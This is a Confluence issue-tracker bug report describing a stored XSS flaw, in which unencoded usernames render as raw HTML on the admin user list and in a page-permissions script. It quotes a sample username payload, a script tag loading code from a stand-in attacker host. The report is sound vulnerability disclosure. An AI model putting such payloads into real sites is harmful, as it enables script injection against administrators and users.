Uploaded image for project: 'Confluence Server and Data Center'
  1. Confluence Server and Data Center
  2. CONFSERVER-7615

XSS bug: usernames not HTML-encoded in all places

    XMLWordPrintable

    Details

      Description

      When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

      Two places I've spotted the raw HTML so far:

      • Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
      • When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:

      if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              ckiehl Chris Kiehl
              Reporter:
              jefft Jeff Turner
              Votes:
              0 Vote for this issue
              Watchers:
              0 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved: